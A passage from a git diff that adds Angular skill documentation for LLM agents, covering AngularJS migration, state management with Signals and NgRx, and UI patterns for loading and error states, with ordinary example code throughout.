import { FormBuilder, FormGroup, Validators } from '@angular/forms';
|
||||
|
||||
@Component({
|
||||
template: `
|
||||
<form [formGroup]="userForm" (ngSubmit)="saveUser()">
|
||||
<input formControlName="name">
|
||||
<input formControlName="email">
|
||||
<button [disabled]="userForm.invalid">Save</button>
|
||||
</form>
|
||||
`
|
||||
})
|
||||
export class UserFormComponent {
|
||||
userForm: FormGroup;
|
||||
|
||||
constructor(private fb: FormBuilder) {
|
||||
this.userForm = this.fb.group({
|
||||
name: ['', Validators.required],
|
||||
email: ['', [Validators.required, Validators.email]]
|
||||
});
|
||||
}
|
||||
|
||||
saveUser() {
|
||||
console.log(this.userForm.value);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Migration Timeline
|
||||
|
||||
```
|
||||
Phase 1: Setup (1-2 weeks)
|
||||
- Install Angular CLI
|
||||
- Set up hybrid app
|
||||
- Configure build tools
|
||||
- Set up testing
|
||||
|
||||
Phase 2: Infrastructure (2-4 weeks)
|
||||
- Migrate services
|
||||
- Migrate utilities
|
||||
- Set up routing
|
||||
- Migrate shared components
|
||||
|
||||
Phase 3: Feature Migration (varies)
|
||||
- Migrate feature by feature
|
||||
- Test thoroughly
|
||||
- Deploy incrementally
|
||||
|
||||
Phase 4: Cleanup (1-2 weeks)
|
||||
- Remove AngularJS code
|
||||
- Remove ngUpgrade
|
||||
- Optimize bundle
|
||||
- Final testing
|
||||
```
|
||||
|
||||
## Resources
|
||||
|
||||
- **references/hybrid-mode.md**: Hybrid app patterns
|
||||
- **references/component-migration.md**: Component conversion guide
|
||||
- **references/dependency-injection.md**: DI migration strategies
|
||||
- **references/routing.md**: Routing migration
|
||||
- **assets/hybrid-bootstrap.ts**: Hybrid app template
|
||||
- **assets/migration-timeline.md**: Project planning
|
||||
- **scripts/analyze-angular-app.sh**: App analysis script
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Start with Services**: Migrate services first (easier)
|
||||
2. **Incremental Approach**: Feature-by-feature migration
|
||||
3. **Test Continuously**: Test at every step
|
||||
4. **Use TypeScript**: Migrate to TypeScript early
|
||||
5. **Follow Style Guide**: Angular style guide from day 1
|
||||
6. **Optimize Later**: Get it working, then optimize
|
||||
7. **Document**: Keep migration notes
|
||||
|
||||
## Common Pitfalls
|
||||
|
||||
- Not setting up hybrid app correctly
|
||||
- Migrating UI before logic
|
||||
- Ignoring change detection differences
|
||||
- Not handling scope properly
|
||||
- Mixing patterns (AngularJS + Angular)
|
||||
- Inadequate testing
|
||||
41
packages/llm/skills/angular-state-management/README.md
Normal file
41
packages/llm/skills/angular-state-management/README.md
Normal file
@ -0,0 +1,41 @@
|
||||
# Angular State Management
|
||||
|
||||
Complete state management patterns for Angular applications optimized for AI agents and LLMs.
|
||||
|
||||
## Overview
|
||||
|
||||
This skill provides decision frameworks and implementation patterns for:
|
||||
|
||||
- **Signal-based Services** - Lightweight state for shared data
|
||||
- **NgRx SignalStore** - Feature-scoped state with computed values
|
||||
- **NgRx Store** - Enterprise-scale global state management
|
||||
- **RxJS ComponentStore** - Reactive component-level state
|
||||
- **Forms State** - Reactive and template-driven form patterns
|
||||
|
||||
## Structure
|
||||
|
||||
The `SKILL.md` file is organized into:
|
||||
|
||||
1. **State Categories** - Local, shared, global, server, URL, and form state
|
||||
2. **Selection Criteria** - Decision trees for choosing the right solution
|
||||
3. **Implementation Patterns** - Complete examples for each approach
|
||||
4. **Migration Guides** - Moving from BehaviorSubject to Signals
|
||||
5. **Bridging Patterns** - Integrating Signals with RxJS
|
||||
|
||||
## When to Use Each Pattern
|
||||
|
||||
- **Signal Service**: Shared UI state (theme, user preferences)
|
||||
- **NgRx SignalStore**: Feature state with computed values
|
||||
- **NgRx Store**: Complex cross-feature dependencies
|
||||
- **ComponentStore**: Component-scoped async operations
|
||||
- **Reactive Forms**: Form state with validation
|
||||
|
||||
## Version
|
||||
|
||||
Current version: 1.0.0 (February 2026)
|
||||
|
||||
## References
|
||||
|
||||
- [Angular Signals](https://angular.dev/guide/signals)
|
||||
- [NgRx](https://ngrx.io)
|
||||
- [NgRx SignalStore](https://ngrx.io/guide/signals)
|
||||
635
packages/llm/skills/angular-state-management/SKILL.md
Normal file
635
packages/llm/skills/angular-state-management/SKILL.md
Normal file
@ -0,0 +1,635 @@
|
||||
---
|
||||
name: angular-state-management
|
||||
description: "Master modern Angular state management with Signals, NgRx, and RxJS. Use when setting up global state, managing component stores, choosing between state solutions, or migrating from legacy patterns."
|
||||
risk: safe
|
||||
source: self
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Angular State Management
|
||||
|
||||
Comprehensive guide to modern Angular state management patterns, from Signal-based local state to global stores and server state synchronization.
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
- Setting up global state management in Angular
|
||||
- Choosing between Signals, NgRx, or Akita
|
||||
- Managing component-level stores
|
||||
- Implementing optimistic updates
|
||||
- Debugging state-related issues
|
||||
- Migrating from legacy state patterns
|
||||
|
||||
## Do Not Use This Skill When
|
||||
|
||||
- The task is unrelated to Angular state management
|
||||
- You need React state management → use `react-state-management`
|
||||
|
||||
---
|
||||
|
||||
## Core Concepts
|
||||
|
||||
### State Categories
|
||||
|
||||
| Type | Description | Solutions |
|
||||
| ---------------- | ---------------------------- | --------------------- |
|
||||
| **Local State** | Component-specific, UI state | Signals, `signal()` |
|
||||
| **Shared State** | Between related components | Signal services |
|
||||
| **Global State** | App-wide, complex | NgRx, Akita, Elf |
|
||||
| **Server State** | Remote data, caching | NgRx Query, RxAngular |
|
||||
| **URL State** | Route parameters | ActivatedRoute |
|
||||
| **Form State** | Input values, validation | Reactive Forms |
|
||||
|
||||
### Selection Criteria
|
||||
|
||||
```
|
||||
Small app, simple state → Signal Services
|
||||
Medium app, moderate state → Component Stores
|
||||
Large app, complex state → NgRx Store
|
||||
Heavy server interaction → NgRx Query + Signal Services
|
||||
Real-time updates → RxAngular + Signals
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quick Start: Signal-Based State
|
||||
|
||||
### Pattern 1: Simple Signal Service
|
||||
|
||||
```typescript
|
||||
// services/counter.service.ts
|
||||
import { Injectable, signal, computed } from "@angular/core";
|
||||
|
||||
@Injectable({ providedIn: "root" })
|
||||
export class CounterService {
|
||||
// Private writable signals
|
||||
private _count = signal(0);
|
||||
|
||||
// Public read-only
|
||||
readonly count = this._count.asReadonly();
|
||||
readonly doubled = computed(() => this._count() * 2);
|
||||
readonly isPositive = computed(() => this._count() > 0);
|
||||
|
||||
increment() {
|
||||
this._count.update((v) => v + 1);
|
||||
}
|
||||
|
||||
decrement() {
|
||||
this._count.update((v) => v - 1);
|
||||
}
|
||||
|
||||
reset() {
|
||||
this._count.set(0);
|
||||
}
|
||||
}
|
||||
|
||||
// Usage in component
|
||||
@Component({
|
||||
template: `
|
||||
<p>Count: {{ counter.count() }}</p>
|
||||
<p>Doubled: {{ counter.doubled() }}</p>
|
||||
<button (click)="counter.increment()">+</button>
|
||||
`,
|
||||
})
|
||||
export class CounterComponent {
|
||||
counter = inject(CounterService);
|
||||
}
|
||||
```
|
||||
|
||||
### Pattern 2: Feature Signal Store
|
||||
|
||||
```typescript
|
||||
// stores/user.store.ts
|
||||
import { Injectable, signal, computed, inject } from "@angular/core";
|
||||
import { HttpClient } from "@angular/common/http";
|
||||
import { toSignal } from "@angular/core/rxjs-interop";
|
||||
|
||||
interface User {
|
||||
id: string;
|
||||
name: string;
|
||||
email: string;
|
||||
}
|
||||
|
||||
interface UserState {
|
||||
user: User | null;
|
||||
loading: boolean;
|
||||
error: string | null;
|
||||
}
|
||||
|
||||
@Injectable({ providedIn: "root" })
|
||||
export class UserStore {
|
||||
private http = inject(HttpClient);
|
||||
|
||||
// State signals
|
||||
private _user = signal<User | null>(null);
|
||||
private _loading = signal(false);
|
||||
private _error = signal<string | null>(null);
|
||||
|
||||
// Selectors (read-only computed)
|
||||
readonly user = computed(() => this._user());
|
||||
readonly loading = computed(() => this._loading());
|
||||
readonly error = computed(() => this._error());
|
||||
readonly isAuthenticated = computed(() => this._user() !== null);
|
||||
readonly displayName = computed(() => this._user()?.name ?? "Guest");
|
||||
|
||||
// Actions
|
||||
async loadUser(id: string) {
|
||||
this._loading.set(true);
|
||||
this._error.set(null);
|
||||
|
||||
try {
|
||||
const user = await fetch(`/api/users/${id}`).then((r) => r.json());
|
||||
this._user.set(user);
|
||||
} catch (e) {
|
||||
this._error.set("Failed to load user");
|
||||
} finally {
|
||||
this._loading.set(false);
|
||||
}
|
||||
}
|
||||
|
||||
updateUser(updates: Partial<User>) {
|
||||
this._user.update((user) => (user ? { ...user, ...updates } : null));
|
||||
}
|
||||
|
||||
logout() {
|
||||
this._user.set(null);
|
||||
this._error.set(null);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Pattern 3: SignalStore (NgRx Signals)
|
||||
|
||||
```typescript
|
||||
// stores/products.store.ts
|
||||
import {
|
||||
signalStore,
|
||||
withState,
|
||||
withMethods,
|
||||
withComputed,
|
||||
patchState,
|
||||
} from "@ngrx/signals";
|
||||
import { inject } from "@angular/core";
|
||||
import { ProductService } from "./product.service";
|
||||
|
||||
interface ProductState {
|
||||
products: Product[];
|
||||
loading: boolean;
|
||||
filter: string;
|
||||
}
|
||||
|
||||
const initialState: ProductState = {
|
||||
products: [],
|
||||
loading: false,
|
||||
filter: "",
|
||||
};
|
||||
|
||||
export const ProductStore = signalStore(
|
||||
{ providedIn: "root" },
|
||||
|
||||
withState(initialState),
|
||||
|
||||
withComputed((store) => ({
|
||||
filteredProducts: computed(() => {
|
||||
const filter = store.filter().toLowerCase();
|
||||
return store
|
||||
.products()
|
||||
.filter((p) => p.name.toLowerCase().includes(filter));
|
||||
}),
|
||||
totalCount: computed(() => store.products().length),
|
||||
})),
|
||||
|
||||
withMethods((store, productService = inject(ProductService)) => ({
|
||||
async loadProducts() {
|
||||
patchState(store, { loading: true });
|
||||
|
||||
try {
|
||||
const products = await productService.getAll();
|
||||
patchState(store, { products, loading: false });
|
||||
} catch {
|
||||
patchState(store, { loading: false });
|
||||
}
|
||||
},
|
||||
|
||||
setFilter(filter: string) {
|
||||
patchState(store, { filter });
|
||||
},
|
||||
|
||||
addProduct(product: Product) {
|
||||
patchState(store, ({ products }) => ({
|
||||
products: [...products, product],
|
||||
}));
|
||||
},
|
||||
})),
|
||||
);
|
||||
|
||||
// Usage
|
||||
@Component({
|
||||
template: `
|
||||
<input (input)="store.setFilter($event.target.value)" />
|
||||
@if (store.loading()) {
|
||||
<app-spinner />
|
||||
} @else {
|
||||
@for (product of store.filteredProducts(); track product.id) {
|
||||
<app-product-card [product]="product" />
|
||||
}
|
||||
}
|
||||
`,
|
||||
})
|
||||
export class ProductListComponent {
|
||||
store = inject(ProductStore);
|
||||
|
||||
ngOnInit() {
|
||||
this.store.loadProducts();
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## NgRx Store (Global State)
|
||||
|
||||
### Setup
|
||||
|
||||
```typescript
|
||||
// store/app.state.ts
|
||||
import { ActionReducerMap } from "@ngrx/store";
|
||||
|
||||
export interface AppState {
|
||||
user: UserState;
|
||||
cart: CartState;
|
||||
}
|
||||
|
||||
export const reducers: ActionReducerMap<AppState> = {
|
||||
user: userReducer,
|
||||
cart: cartReducer,
|
||||
};
|
||||
|
||||
// main.ts
|
||||
bootstrapApplication(AppComponent, {
|
||||
providers: [
|
||||
provideStore(reducers),
|
||||
provideEffects([UserEffects, CartEffects]),
|
||||
provideStoreDevtools({ maxAge: 25 }),
|
||||
],
|
||||
});
|
||||
```
|
||||
|
||||
### Feature Slice Pattern
|
||||
|
||||
```typescript
|
||||
// store/user/user.actions.ts
|
||||
import { createActionGroup, props, emptyProps } from "@ngrx/store";
|
||||
|
||||
export const UserActions = createActionGroup({
|
||||
source: "User",
|
||||
events: {
|
||||
"Load User": props<{ userId: string }>(),
|
||||
"Load User Success": props<{ user: User }>(),
|
||||
"Load User Failure": props<{ error: string }>(),
|
||||
"Update User": props<{ updates: Partial<User> }>(),
|
||||
Logout: emptyProps(),
|
||||
},
|
||||
});
|
||||
```
|
||||
|
||||
```typescript
|
||||
// store/user/user.reducer.ts
|
||||
import { createReducer, on } from "@ngrx/store";
|
||||
import { UserActions } from "./user.actions";
|
||||
|
||||
export interface UserState {
|
||||
user: User | null;
|
||||
loading: boolean;
|
||||
error: string | null;
|
||||
}
|
||||
|
||||
const initialState: UserState = {
|
||||
user: null,
|
||||
loading: false,
|
||||
error: null,
|
||||
};
|
||||
|
||||
export const userReducer = createReducer(
|
||||
initialState,
|
||||
|
||||
on(UserActions.loadUser, (state) => ({
|
||||
...state,
|
||||
loading: true,
|
||||
error: null,
|
||||
})),
|
||||
|
||||
on(UserActions.loadUserSuccess, (state, { user }) => ({
|
||||
...state,
|
||||
user,
|
||||
loading: false,
|
||||
})),
|
||||
|
||||
on(UserActions.loadUserFailure, (state, { error }) => ({
|
||||
...state,
|
||||
loading: false,
|
||||
error,
|
||||
})),
|
||||
|
||||
on(UserActions.logout, () => initialState),
|
||||
);
|
||||
```
|
||||
|
||||
```typescript
|
||||
// store/user/user.selectors.ts
|
||||
import { createFeatureSelector, createSelector } from "@ngrx/store";
|
||||
import { UserState } from "./user.reducer";
|
||||
|
||||
export const selectUserState = createFeatureSelector<UserState>("user");
|
||||
|
||||
export const selectUser = createSelector(
|
||||
selectUserState,
|
||||
(state) => state.user,
|
||||
);
|
||||
|
||||
export const selectUserLoading = createSelector(
|
||||
selectUserState,
|
||||
(state) => state.loading,
|
||||
);
|
||||
|
||||
export const selectIsAuthenticated = createSelector(
|
||||
selectUser,
|
||||
(user) => user !== null,
|
||||
);
|
||||
```
|
||||
|
||||
```typescript
|
||||
// store/user/user.effects.ts
|
||||
import { Injectable, inject } from "@angular/core";
|
||||
import { Actions, createEffect, ofType } from "@ngrx/effects";
|
||||
import { switchMap, map, catchError, of } from "rxjs";
|
||||
|
||||
@Injectable()
|
||||
export class UserEffects {
|
||||
private actions$ = inject(Actions);
|
||||
private userService = inject(UserService);
|
||||
|
||||
loadUser$ = createEffect(() =>
|
||||
this.actions$.pipe(
|
||||
ofType(UserActions.loadUser),
|
||||
switchMap(({ userId }) =>
|
||||
this.userService.getUser(userId).pipe(
|
||||
map((user) => UserActions.loadUserSuccess({ user })),
|
||||
catchError((error) =>
|
||||
of(UserActions.loadUserFailure({ error: error.message })),
|
||||
),
|
||||
),
|
||||
),
|
||||
),
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
### Component Usage
|
||||
|
||||
```typescript
|
||||
@Component({
|
||||
template: `
|
||||
@if (loading()) {
|
||||
<app-spinner />
|
||||
} @else if (user(); as user) {
|
||||
<h1>Welcome, {{ user.name }}</h1>
|
||||
<button (click)="logout()">Logout</button>
|
||||
}
|
||||
`,
|
||||
})
|
||||
export class HeaderComponent {
|
||||
private store = inject(Store);
|
||||
|
||||
user = this.store.selectSignal(selectUser);
|
||||
loading = this.store.selectSignal(selectUserLoading);
|
||||
|
||||
logout() {
|
||||
this.store.dispatch(UserActions.logout());
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## RxJS-Based Patterns
|
||||
|
||||
### Component Store (Local Feature State)
|
||||
|
||||
```typescript
|
||||
// stores/todo.store.ts
|
||||
import { Injectable } from "@angular/core";
|
||||
import { ComponentStore } from "@ngrx/component-store";
|
||||
import { switchMap, tap, catchError, EMPTY } from "rxjs";
|
||||
|
||||
interface TodoState {
|
||||
todos: Todo[];
|
||||
loading: boolean;
|
||||
}
|
||||
|
||||
@Injectable()
|
||||
export class TodoStore extends ComponentStore<TodoState> {
|
||||
constructor(private todoService: TodoService) {
|
||||
super({ todos: [], loading: false });
|
||||
}
|
||||
|
||||
// Selectors
|
||||
readonly todos$ = this.select((state) => state.todos);
|
||||
readonly loading$ = this.select((state) => state.loading);
|
||||
readonly completedCount$ = this.select(
|
||||
this.todos$,
|
||||
(todos) => todos.filter((t) => t.completed).length,
|
||||
);
|
||||
|
||||
// Updaters
|
||||
readonly addTodo = this.updater((state, todo: Todo) => ({
|
||||
...state,
|
||||
todos: [...state.todos, todo],
|
||||
}));
|
||||
|
||||
readonly toggleTodo = this.updater((state, id: string) => ({
|
||||
...state,
|
||||
todos: state.todos.map((t) =>
|
||||
t.id === id ? { ...t, completed: !t.completed } : t,
|
||||
),
|
||||
}));
|
||||
|
||||
// Effects
|
||||
readonly loadTodos = this.effect<void>((trigger$) =>
|
||||
trigger$.pipe(
|
||||
tap(() => this.patchState({ loading: true })),
|
||||
switchMap(() =>
|
||||
this.todoService.getAll().pipe(
|
||||
tap({
|
||||
next: (todos) => this.patchState({ todos, loading: false }),
|
||||
error: () => this.patchState({ loading: false }),
|
||||
}),
|
||||
catchError(() => EMPTY),
|
||||
),
|
||||
),
|
||||
),
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Server State with Signals
|
||||
|
||||
### HTTP + Signals Pattern
|
||||
|
||||
```typescript
|
||||
// services/api.service.ts
|
||||
import { Injectable, signal, inject } from "@angular/core";
|
||||
import { HttpClient } from "@angular/common/http";
|
||||
import { toSignal } from "@angular/core/rxjs-interop";
|
||||
|
||||
interface ApiState<T> {
|
||||
data: T | null;
|
||||
loading: boolean;
|
||||
error: string | null;
|
||||
}
|
||||
|
||||
@Injectable({ providedIn: "root" })
|
||||
export class ProductApiService {
|
||||
private http = inject(HttpClient);
|
||||
|
||||
private _state = signal<ApiState<Product[]>>({
|
||||
data: null,
|
||||
loading: false,
|
||||
error: null,
|
||||
});
|
||||
|
||||
readonly products = computed(() => this._state().data ?? []);
|
||||
readonly loading = computed(() => this._state().loading);
|
||||
readonly error = computed(() => this._state().error);
|
||||
|
||||
async fetchProducts(): Promise<void> {
|
||||
this._state.update((s) => ({ ...s, loading: true, error: null }));
|
||||
|
||||
try {
|
||||
const data = await firstValueFrom(
|
||||
this.http.get<Product[]>("/api/products"),
|
||||
);
|
||||
this._state.update((s) => ({ ...s, data, loading: false }));
|
||||
} catch (e) {
|
||||
this._state.update((s) => ({
|
||||
...s,
|
||||
loading: false,
|
||||
error: "Failed to fetch products",
|
||||
}));
|
||||
}
|
||||
}
|
||||
|
||||
// Optimistic update
|
||||
async deleteProduct(id: string): Promise<void> {
|
||||
const previousData = this._state().data;
|
||||
|
||||
// Optimistically remove
|
||||
this._state.update((s) => ({
|
||||
...s,
|
||||
data: s.data?.filter((p) => p.id !== id) ?? null,
|
||||
}));
|
||||
|
||||
try {
|
||||
await firstValueFrom(this.http.delete(`/api/products/${id}`));
|
||||
} catch {
|
||||
// Rollback on error
|
||||
this._state.update((s) => ({ ...s, data: previousData }));
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Best Practices
|
||||
|
||||
### Do's
|
||||
|
||||
| Practice | Why |
|
||||
| ---------------------------------- | ---------------------------------- |
|
||||
| Use Signals for local state | Simple, reactive, no subscriptions |
|
||||
| Use `computed()` for derived data | Auto-updates, memoized |
|
||||
| Colocate state with feature | Easier to maintain |
|
||||
| Use NgRx for complex flows | Actions, effects, devtools |
|
||||
| Prefer `inject()` over constructor | Cleaner, works in factories |
|
||||
|
||||
### Don'ts
|
||||
|
||||
| Anti-Pattern | Instead |
|
||||
| --------------------------------- | ----------------------------------------------------- |
|
||||
| Store derived data | Use `computed()` |
|
||||
| Mutate signals directly | Use `set()` or `update()` |
|
||||
| Over-globalize state | Keep local when possible |
|
||||
| Mix RxJS and Signals chaotically | Choose primary, bridge with `toSignal`/`toObservable` |
|
||||
| Subscribe in components for state | Use template with signals |
|
||||
|
||||
---
|
||||
|
||||
## Migration Path
|
||||
|
||||
### From BehaviorSubject to Signals
|
||||
|
||||
```typescript
|
||||
// Before: RxJS-based
|
||||
@Injectable({ providedIn: "root" })
|
||||
export class OldUserService {
|
||||
private userSubject = new BehaviorSubject<User | null>(null);
|
||||
user$ = this.userSubject.asObservable();
|
||||
|
||||
setUser(user: User) {
|
||||
this.userSubject.next(user);
|
||||
}
|
||||
}
|
||||
|
||||
// After: Signal-based
|
||||
@Injectable({ providedIn: "root" })
|
||||
export class UserService {
|
||||
private _user = signal<User | null>(null);
|
||||
readonly user = this._user.asReadonly();
|
||||
|
||||
setUser(user: User) {
|
||||
this._user.set(user);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Bridging Signals and RxJS
|
||||
|
||||
```typescript
|
||||
import { toSignal, toObservable } from '@angular/core/rxjs-interop';
|
||||
|
||||
// Observable → Signal
|
||||
@Component({...})
|
||||
export class ExampleComponent {
|
||||
private route = inject(ActivatedRoute);
|
||||
|
||||
// Convert Observable to Signal
|
||||
userId = toSignal(
|
||||
this.route.params.pipe(map(p => p['id'])),
|
||||
{ initialValue: '' }
|
||||
);
|
||||
}
|
||||
|
||||
// Signal → Observable
|
||||
export class DataService {
|
||||
private filter = signal('');
|
||||
|
||||
// Convert Signal to Observable
|
||||
filter$ = toObservable(this.filter);
|
||||
|
||||
filteredData$ = this.filter$.pipe(
|
||||
debounceTime(300),
|
||||
switchMap(filter => this.http.get(`/api/data?q=${filter}`))
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Resources
|
||||
|
||||
- [Angular Signals Guide](https://angular.dev/guide/signals)
|
||||
- [NgRx Documentation](https://ngrx.io/)
|
||||
- [NgRx SignalStore](https://ngrx.io/guide/signals)
|
||||
- [RxAngular](https://www.rx-angular.io/)
|
||||
13
packages/llm/skills/angular-state-management/metadata.json
Normal file
13
packages/llm/skills/angular-state-management/metadata.json
Normal file
@ -0,0 +1,13 @@
|
||||
{
|
||||
"version": "1.0.0",
|
||||
"organization": "Antigravity Awesome Skills",
|
||||
"date": "February 2026",
|
||||
"abstract": "Complete state management guide for Angular applications designed for AI agents and LLMs. Covers Signal-based services, NgRx for global state, RxJS patterns, and component stores. Includes decision trees for choosing the right solution, migration patterns from BehaviorSubject to Signals, and strategies for bridging Signals with RxJS observables.",
|
||||
"references": [
|
||||
"https://angular.dev/guide/signals",
|
||||
"https://ngrx.io",
|
||||
"https://ngrx.io/guide/signals",
|
||||
"https://www.rx-angular.io",
|
||||
"https://github.com/ngrx/platform"
|
||||
]
|
||||
}
|
||||
55
packages/llm/skills/angular-ui-patterns/README.md
Normal file
55
packages/llm/skills/angular-ui-patterns/README.md
Normal file
@ -0,0 +1,55 @@
|
||||
# Angular UI Patterns
|
||||
|
||||
Modern UI patterns for building robust Angular applications optimized for AI agents and LLMs.
|
||||
|
||||
## Overview
|
||||
|
||||
This skill covers essential UI patterns for:
|
||||
|
||||
- **Loading States** - Skeleton vs spinner decision trees
|
||||
- **Error Handling** - Error boundary hierarchy and recovery
|
||||
- **Progressive Disclosure** - Using `@defer` for lazy rendering
|
||||
- **Data Display** - Handling empty, loading, and error states
|
||||
- **Form Patterns** - Submission states and validation feedback
|
||||
- **Dialog/Modal Patterns** - Proper dialog lifecycle management
|
||||
|
||||
## Core Principles
|
||||
|
||||
1. **Never show stale UI** - Only show loading when no data exists
|
||||
2. **Surface all errors** - Never silently fail
|
||||
3. **Optimistic updates** - Update UI before server confirms
|
||||
4. **Progressive disclosure** - Use `@defer` to load non-critical content
|
||||
5. **Graceful degradation** - Fallback for failed features
|
||||
|
||||
## Structure
|
||||
|
||||
The `SKILL.md` file includes:
|
||||
|
||||
1. **Golden Rules** - Non-negotiable patterns to follow
|
||||
2. **Decision Trees** - When to use skeleton vs spinner
|
||||
3. **Code Examples** - Correct vs incorrect implementations
|
||||
4. **Anti-patterns** - Common mistakes to avoid
|
||||
|
||||
## Quick Reference
|
||||
|
||||
```html
|
||||
<!-- Angular template pattern for data states -->
|
||||
@if (error()) {
|
||||
<app-error-state [error]="error()" (retry)="load()" />
|
||||
} @else if (loading() && !data()) {
|
||||
<app-skeleton-state />
|
||||
} @else if (!data()?.length) {
|
||||
<app-empty-state message="No items found" />
|
||||
} @else {
|
||||
<app-data-display [data]="data()" />
|
||||
}
|
||||
```
|
||||
|
||||
## Version
|
||||
|
||||
Current version: 1.0.0 (February 2026)
|
||||
|
||||
## References
|
||||
|
||||
- [Angular @defer](https://angular.dev/guide/defer)
|
||||
- [Angular Templates](https://angular.dev/guide/templates)
|
||||
512
packages/llm/skills/angular-ui-patterns/SKILL.md
Normal file
512
packages/llm/skills/angular-ui-patterns/SKILL.md
Normal file
@ -0,0 +1,512 @@
|
||||
---
|
||||
name: angular-ui-patterns
|
||||
description: "Modern Angular UI patterns for loading states, error handling, and data display. Use when building UI components, handling async data, or managing component states."
|
||||
risk: safe
|
||||
source: self
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Angular UI Patterns
|
||||
|
||||
## Core Principles
|
||||
|
||||
1. **Never show stale UI** - Loading states only when actually loading
|
||||
2. **Always surface errors** - Users must know when something fails
|
||||
3. **Optimistic updates** - Make the UI feel instant
|
||||
4. **Progressive disclosure** - Use `@defer` to show content as available
|
||||
5. **Graceful degradation** - Partial data is better than no data
|
||||
|
||||
---
|
||||
|
||||
## Loading State Patterns
|
||||
|
||||
### The Golden Rule
|
||||
|
||||
**Show loading indicator ONLY when there's no data to display.**
|
||||
|
||||
```typescript
|
||||
@Component({
|
||||
template: `
|
||||
@if (error()) {
|
||||
<app-error-state [error]="error()" (retry)="load()" />
|
||||
} @else if (loading() && !items().length) {
|
||||
<app-skeleton-list />
|
||||
} @else if (!items().length) {
|
||||
<app-empty-state message="No items found" />
|
||||
} @else {
|
||||
<app-item-list [items]="items()" />
|
||||
}
|
||||
`,
|
||||
})
|
||||
export class ItemListComponent {
|
||||
private store = inject(ItemStore);
|
||||
|
||||
items = this.store.items;
|
||||
loading = this.store.loading;
|
||||
error = this.store.error;
|
||||
}
|
||||
```
|
||||
|
||||
### Loading State Decision Tree
|
||||
|
||||
```
|
||||
Is there an error?
|
||||
→ Yes: Show error state with retry option
|
||||
→ No: Continue
|
||||
|
||||
Is it loading AND we have no data?
|
||||
→ Yes: Show loading indicator (spinner/skeleton)
|
||||
→ No: Continue
|
||||
|
||||
Do we have data?
|
||||
→ Yes, with items: Show the data
|
||||
→ Yes, but empty: Show empty state
|
||||
→ No: Show loading (fallback)
|
||||
```
|
||||
|
||||
### Skeleton vs Spinner
|
||||
|
||||
| Use Skeleton When | Use Spinner When |
|
||||
| -------------------- | --------------------- |
|
||||
| Known content shape | Unknown content shape |
|
||||
| List/card layouts | Modal actions |
|
||||
| Initial page load | Button submissions |
|
||||
| Content placeholders | Inline operations |
|
||||
|
||||
---
|
||||
|
||||
## Control Flow Patterns
|
||||
|
||||
### @if/@else for Conditional Rendering
|
||||
|
||||
```html
|
||||
@if (user(); as user) {
|
||||
<span>Welcome, {{ user.name }}</span>
|
||||
} @else if (loading()) {
|
||||
<app-spinner size="small" />
|
||||
} @else {
|
||||
<a routerLink="/login">Sign In</a>
|
||||
}
|
||||
```
|
||||
|
||||
### @for with Track
|
||||
|
||||
```html
|
||||
@for (item of items(); track item.id) {
|
||||
<app-item-card [item]="item" (delete)="remove(item.id)" />
|
||||
} @empty {
|
||||
<app-empty-state
|
||||
icon="inbox"
|
||||
message="No items yet"
|
||||
actionLabel="Create Item"
|
||||
(action)="create()"
|
||||
/>
|
||||
}
|
||||
```
|
||||
|
||||
### @defer for Progressive Loading
|
||||
|
||||
```html
|
||||
<!-- Critical content loads immediately -->
|
||||
<app-header />
|
||||
<app-hero-section />
|
||||
|
||||
<!-- Non-critical content deferred -->
|
||||
@defer (on viewport) {
|
||||
<app-comments [postId]="postId()" />
|
||||
} @placeholder {
|
||||
<div class="h-32 bg-gray-100 animate-pulse"></div>
|
||||
} @loading (minimum 200ms) {
|
||||
<app-spinner />
|
||||
} @error {
|
||||
<app-error-state message="Failed to load comments" />
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Error Handling Patterns
|
||||
|
||||
### Error Handling Hierarchy
|
||||
|
||||
```
|
||||
1. Inline error (field-level) → Form validation errors
|
||||
2. Toast notification → Recoverable errors, user can retry
|
||||
3. Error banner → Page-level errors, data still partially usable
|
||||
4. Full error screen → Unrecoverable, needs user action
|
||||
```
|
||||
|
||||
### Always Show Errors
|
||||
|
||||
**CRITICAL: Never swallow errors silently.**
|
||||
|
||||
```typescript
|
||||
// CORRECT - Error always surfaced to user
|
||||
@Component({...})
|
||||
export class CreateItemComponent {
|
||||
private store = inject(ItemStore);
|
||||
private toast = inject(ToastService);
|
||||
|
||||
async create(data: CreateItemDto) {
|
||||
try {
|
||||
await this.store.create(data);
|
||||
this.toast.success('Item created successfully');
|
||||
this.router.navigate(['/items']);
|
||||
} catch (error) {
|
||||
console.error('createItem failed:', error);
|
||||
this.toast.error('Failed to create item. Please try again.');
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// WRONG - Error silently caught
|
||||
async create(data: CreateItemDto) {
|
||||
try {
|
||||
await this.store.create(data);
|
||||
} catch (error) {
|
||||
console.error(error); // User sees nothing!
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Error State Component Pattern
|
||||
|
||||
```typescript
|
||||
@Component({
|
||||
selector: "app-error-state",
|
||||
standalone: true,
|
||||
imports: [NgOptimizedImage],
|
||||
template: `
|
||||
<div class="error-state">
|
||||
<img ngSrc="/assets/error-icon.svg" width="64" height="64" alt="" />
|
||||
<h3>{{ title() }}</h3>
|
||||
<p>{{ message() }}</p>
|
||||
@if (retry.observed) {
|
||||
<button (click)="retry.emit()" class="btn-primary">Try Again</button>
|
||||
}
|
||||
</div>
|
||||
`,
|
||||
})
|
||||
export class ErrorStateComponent {
|
||||
title = input("Something went wrong");
|
||||
message = input("An unexpected error occurred");
